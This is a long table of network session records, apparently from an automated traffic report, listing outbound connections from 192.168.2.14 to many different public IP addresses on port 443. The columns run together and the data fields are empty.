                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18540192.168.2.145161877.164.247.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18541192.168.2.146030254.158.236.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18542192.168.2.144711068.69.34.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18543192.168.2.144573886.208.149.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18544192.168.2.144184447.218.175.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18545192.168.2.145032272.125.250.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18546192.168.2.1433476136.122.252.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18547192.168.2.1451286158.182.105.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18548192.168.2.1448100200.88.159.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18549192.168.2.144965495.61.15.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18550192.168.2.1447306125.80.15.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18551192.168.2.1456204171.104.234.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18552192.168.2.145630619.114.197.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18553192.168.2.1437050196.207.94.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18554192.168.2.144184885.229.232.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18555192.168.2.145049458.58.21.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18556192.168.2.1453778120.203.11.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18557192.168.2.1452940181.138.119.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18558192.168.2.1455388202.201.101.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18559192.168.2.145189059.136.124.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18560192.168.2.1440866120.132.80.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18561192.168.2.143951440.19.195.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18562192.168.2.1459682109.27.89.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18563192.168.2.143752087.78.132.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18564192.168.2.1452124134.48.251.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18565192.168.2.14604521.61.156.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18566192.168.2.143342479.65.125.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18567192.168.2.1435962112.73.145.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18568192.168.2.1432966129.161.165.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18569192.168.2.1438000152.71.3.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18570192.168.2.145736861.230.45.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18571192.168.2.1450636192.196.45.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18572192.168.2.143673043.172.193.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18573192.168.2.1443118126.169.99.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18574192.168.2.145084832.147.174.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18575192.168.2.144686697.54.98.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18576192.168.2.1451714162.59.111.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18577192.168.2.145952236.245.225.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18578192.168.2.1456366201.113.36.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18579192.168.2.145593649.139.214.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18580192.168.2.145732847.254.248.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18581192.168.2.1434050187.233.88.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18582192.168.2.145188039.32.124.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18583192.168.2.1443114194.93.38.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18584192.168.2.145276693.127.130.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18585192.168.2.14602888.178.209.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18586192.168.2.1437102121.243.153.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18587192.168.2.144538490.237.199.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18588192.168.2.1460220196.233.107.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18589192.168.2.144462448.42.70.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18590192.168.2.1453506113.160.243.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18591192.168.2.1446372154.192.131.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18592192.168.2.1458198153.151.74.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18593192.168.2.143512260.244.47.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18594192.168.2.1448520116.213.144.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18595192.168.2.1458878195.92.172.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18596192.168.2.1456846110.42.46.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18597192.168.2.145264454.35.26.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18598192.168.2.1454066198.16.184.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18599192.168.2.1451972184.175.106.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18600192.168.2.143789040.126.167.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18601192.168.2.143540049.166.165.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18602192.168.2.1450648179.220.96.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18603192.168.2.145642251.233.29.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18604192.168.2.1458674152.141.100.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18605192.168.2.144984631.139.193.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18606192.168.2.1449726181.120.118.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18607192.168.2.1435452195.174.51.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18608192.168.2.1449880150.245.200.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18609192.168.2.1445446192.165.161.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18610192.168.2.144779039.203.43.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18611192.168.2.1452014116.183.246.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18612192.168.2.1459860139.165.3.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18613192.168.2.143443880.129.114.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18614192.168.2.1437660125.100.9.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18615192.168.2.144643292.218.171.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18616192.168.2.1459570213.1.5.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18617192.168.2.144851844.64.189.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18618192.168.2.145290684.115.138.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18619192.168.2.144862042.239.131.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18620192.168.2.1437222124.209.67.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18621192.168.2.1440320213.23.146.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18622192.168.2.145261098.124.79.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18623192.168.2.1433510114.241.93.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18624192.168.2.146096234.71.149.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18625192.168.2.144689095.1.108.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18626192.168.2.145269467.159.44.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18627192.168.2.1446790103.99.108.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18628192.168.2.144164080.26.79.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18629192.168.2.1458264147.151.19.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18630192.168.2.1458854116.217.189.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18631192.168.2.1437758216.203.242.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18632192.168.2.1458484125.47.15.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18633192.168.2.144779850.104.151.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18634192.168.2.1432966164.121.230.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18635192.168.2.144871217.66.146.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18636192.168.2.1445596188.197.176.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18637192.168.2.1459914178.101.12.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18638192.168.2.144850436.197.46.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18639192.168.2.1441980161.231.35.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18640192.168.2.1446708187.127.148.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18641192.168.2.1454426128.116.238.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18642192.168.2.1440774103.65.92.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18643192.168.2.1457350133.44.108.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18644192.168.2.145270063.16.48.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18645192.168.2.1438848187.115.193.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18646192.168.2.1448480191.83.15.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18647192.168.2.1450772173.143.220.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18648192.168.2.1433672155.127.72.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18649192.168.2.1446454198.73.239.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18650192.168.2.1441730155.212.151.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18651192.168.2.146084438.244.80.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18652192.168.2.1438050179.118.58.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18653192.168.2.145389657.178.118.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18654192.168.2.144051252.148.32.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18655192.168.2.143895091.68.115.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18656192.168.2.1442006117.8.113.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18657192.168.2.1449708199.113.159.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18658192.168.2.144825899.111.2.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18659192.168.2.1450904222.39.70.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18660192.168.2.145422880.66.233.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18661192.168.2.14485009.215.137.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18662192.168.2.14532461.47.255.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18663192.168.2.1453830181.14.229.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18664192.168.2.1434108103.82.85.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18665192.168.2.144029032.182.134.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18666192.168.2.1458192116.218.109.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18667192.168.2.1437466177.130.188.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18668192.168.2.1457556119.162.126.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18669192.168.2.144729079.202.0.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18670192.168.2.143932213.192.216.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18671192.168.2.1435346156.17.86.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18672192.168.2.1435112223.54.151.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18673192.168.2.1436088112.183.117.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18674192.168.2.14591069.147.8.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18675192.168.2.1436732123.193.183.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18676192.168.2.1439846177.157.151.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18677192.168.2.145177057.165.197.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18678192.168.2.1447942180.29.74.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18679192.168.2.1446418178.85.69.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18680192.168.2.1460126166.210.56.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18681192.168.2.14455922.100.156.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18682192.168.2.144899682.150.27.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18683192.168.2.14585425.209.2.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18684192.168.2.1441476195.69.194.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18685192.168.2.1433706170.141.55.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18686192.168.2.145624820.211.17.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18687192.168.2.1450346146.114.196.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18688192.168.2.1454146164.171.22.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18689192.168.2.145440866.75.34.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18690192.168.2.146042067.71.24.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18691192.168.2.144003825.15.46.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18692192.168.2.145705813.127.92.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18693192.168.2.1434210163.125.114.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18694192.168.2.1447088162.58.18.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18695192.168.2.1433010217.226.175.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18696192.168.2.144901612.68.145.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18697192.168.2.1447214158.65.0.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18698192.168.2.1448132125.53.58.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18699192.168.2.1457594156.121.219.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18700192.168.2.1450794204.128.79.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18701192.168.2.143807498.193.99.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18702192.168.2.144566860.185.92.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18703192.168.2.143617448.65.202.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18704192.168.2.145995217.115.161.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18705192.168.2.1445834201.61.143.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18706192.168.2.1457270101.133.225.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18707192.168.2.1435156220.233.47.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18708192.168.2.1451076195.222.4.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18709192.168.2.1445294213.105.39.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18710192.168.2.1436784178.245.239.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18711192.168.2.1436122146.223.51.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18712192.168.2.144397825.231.34.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18713192.168.2.1436036220.17.137.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18714192.168.2.1460258115.115.147.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18715192.168.2.144781076.17.218.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18716192.168.2.144726668.167.235.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18717192.168.2.1442008159.36.67.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18718192.168.2.1456066131.250.209.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18719192.168.2.1444054160.141.180.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18720192.168.2.145471414.4.216.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18721192.168.2.144321269.58.137.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18722192.168.2.1458614159.152.87.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18723192.168.2.1452340182.112.13.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18724192.168.2.145379296.0.234.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18725192.168.2.144041094.250.18.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18726192.168.2.1444270164.169.96.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18727192.168.2.145307853.211.19.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18728192.168.2.145632670.48.249.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18729192.168.2.1437048162.250.66.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18730192.168.2.1435320124.242.79.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18731192.168.2.1441390189.184.242.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18732192.168.2.145666839.213.246.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18733192.168.2.1437984218.214.78.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18734192.168.2.1460630131.139.104.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18735192.168.2.1438736147.67.77.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18736192.168.2.1446964161.245.96.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18737192.168.2.1455880134.116.141.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18738192.168.2.1436256152.246.145.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18739192.168.2.145861870.126.234.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18740192.168.2.1447096162.108.75.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18741192.168.2.1435664183.185.125.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18742192.168.2.1454178133.78.131.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18743192.168.2.1437846166.105.146.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18744192.168.2.144404258.53.95.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18745192.168.2.143683249.10.6.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18746192.168.2.1446258180.96.81.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18747192.168.2.145206619.95.36.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18748192.168.2.1433456210.212.60.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18749192.168.2.1454242197.26.246.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18750192.168.2.143435090.211.87.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18751192.168.2.1448916164.107.103.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18752192.168.2.145172886.216.245.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18753192.168.2.1443592174.15.185.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18754192.168.2.1435780187.24.89.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18755192.168.2.1456510162.255.30.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18756192.168.2.1447644182.92.132.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18757192.168.2.1441034142.250.126.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18758192.168.2.1447724169.92.241.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18759192.168.2.1441656112.229.190.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18760192.168.2.1453610192.72.71.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18761192.168.2.1452102183.104.232.136443
